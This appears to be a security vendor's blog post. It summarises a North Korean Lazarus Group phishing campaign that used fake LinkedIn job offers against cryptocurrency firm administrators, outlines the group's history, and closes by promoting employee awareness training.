Infamous Lazarus Group Targets Cryptocurrency Firms

The Lazarus group, infamous for carrying out hacking campaigns all over the world, having its roots in North Korea, is back. This time cybercriminals from the group are targeting their attention on Cryptocurrency Firms by sending these financial organizations phishing messages via LinkedIn.

Cyber Security analysts and researchers have recently detected events that have revealed that the Lazarus group is broadening the spectrum of their malicious campaign. The group has taken to Microsoft owned LinkedIn to send phishing messages to the victims’ personal LinkedIn accounts.

This is aimed to trick their victims into disclosing their e-wallet credentials. Using these credentials, hackers can easily access the victims’ online bank accounts and cryptocurrency wallets and withdraw money from them.

Researchers and security professionals have concluded that the Lazarus group has been continuing their malicious activities for years and this time their campaigns are more money-driven than information-driven.

This has increased the necessity of becoming more aware and informed about social engineering attack vectors, especially for organizations that operate within the targeted verticals and financial sectors.

Details on the Lazarus Group’s Recent Cyber Attack Campaign

Lazarus Group shifts to Cryptocurrency Firms

Cyber attackers belonging to the Lazarus Group targeted the system administrators who belonged to a certain cryptocurrency firm. They made use of a phishing document that was incorporated within a message they had sent to the administrators’ personal LinkedIn accounts.

This phishing document impersonated an authentic advertisement for a job role in the blockchain technology company that perfectly matched the profile and skill set of the victims.

The victims seeing the profile for the job naturally got intrigued and interested, and they readily clicked on the phishing document that appeared along with the message.

On clicking on the document, a tab opened up informing the targets that the document is secure via GDPR (General Data Protection Regulation), which blocked access to the information in it.

It further informed them that to gain access to the document, they had to enable macros in MS Word. As soon as the target enabled the macros, the embedded macro code included in the document by the hackers started functioning.

This malicious code generated an LNK file which further enabled the execution of mshta.exe. This regenerated or enabled the functioning of a “bit.ly” link created back in May 2019.  

Researchers surveyed the link enclosed within the phishing message and found out that it was accessed around 73 times from 19 different countries that included China, the US, and the UK. 

According to security experts, the “bit.ly” link that was generated, redirected the victims to a particular platform that implemented a VBScript to execute detailed follow-ups on them and collected valuable information.

All these collected data were subsequently forwarded to a second Command and Control (C2) domain. This eventually resulted in the download and execution of a PowerShell script that retrieved a malicious payload from a third C2 domain.

Implementation of the Cyber Attack and Related Findings

North Korean hacker group APT (aka Lazarus)

The payload which was the component of the cyber attack (attack vector), instigated the auto-installation of several malicious software or implants into the victim’s system.

These implants further paved the way for the installation of more malicious files, initiated C2 communication, performed random commands, and stole personal credentials and corporate information from their operating systems. 

Researchers found out how the Lazarus group was successful in evading detection and identification. The hackers disabled the Windows Defender monitoring protocol in all of the victims’ operating systems.

However, despite the implementation of methods for avoiding identification, several commands executed through cmd.exe provided security professionals with the opportunity for detecting them. 

A Brief History of the Group’s Previous Malicious Campaigns

Lazarus Group was linked to WannaCry Cyber Attack

The infamous Lazarus group goes by several names such as Hidden Cobra and APT 38. This North Korean group of cybercriminals started their malicious activities back in 2009. The group was involved in the infamous WannaCry cyber attack that took place in 2017 and was also linked to several cyber attacks dated back in history such as the Swift bank attacks. 

In 2014, Sony Pictures Entertainment was hacked by a group of hackers popularly named as “Guardians of Peace” who leaked confidential information of employees working in the organization. Researchers discovered that the APT or Lazarus group was directly or indirectly involved in perpetrating the attack. 

Lazarus group is rapidly evolving with its tactics from using Trickbot operators to implementing macOS spyware on applications. Recently, the group has taken to MATA (Multi-platform Targeted Malware Framework) to target Windows, macOS, and Linux operating systems. 

Solutions for Evading Similar Attacks

As a CISO or CIO in a cryptocurrency firm, it is imperative to implement a well-rounded workplace security policy that includes an advanced cybersecurity awareness and training program.

Employees in an organization are usually the weakest link and the most frequent reason for data breaches. Due to being ill-informed and unaware of the attack vectors and social engineering methods implemented by hackers, employees easily fall prey to cyber attacks. 

According to a 2020 survey, security analysts worldwide have concluded that more than 70% of all data breaches are a result of poor cyber-awareness among employees. 

A cybersecurity awareness training program starts working by simulating sophisticated replicas of real-life cyber attacks on your employees. An unlimited number of attacks can be simulated to increase security awareness.

After which the training process is initiated by imparting knowledge about various types of attack vectors through awareness content giving detailed insight on them, visual presentations on attack identification, as well as video lectures and advisories on the same.

Regular cumulative assessments are taken to ensure improvements and to initiate a better response against attacks. Such a program delivers detailed analysis of simulation reports on the dashboard to track results and provides information on progress made via assessments and knowledge imparting sessions taken by employees.

This is not the time to sit idle but, to solidify and strengthen the cybersecurity infrastructure in your organization, so that hacker groups like Lazarus can’t conduct a phishing attack on employees and perpetuate a major data breach.

  

Leave a Reply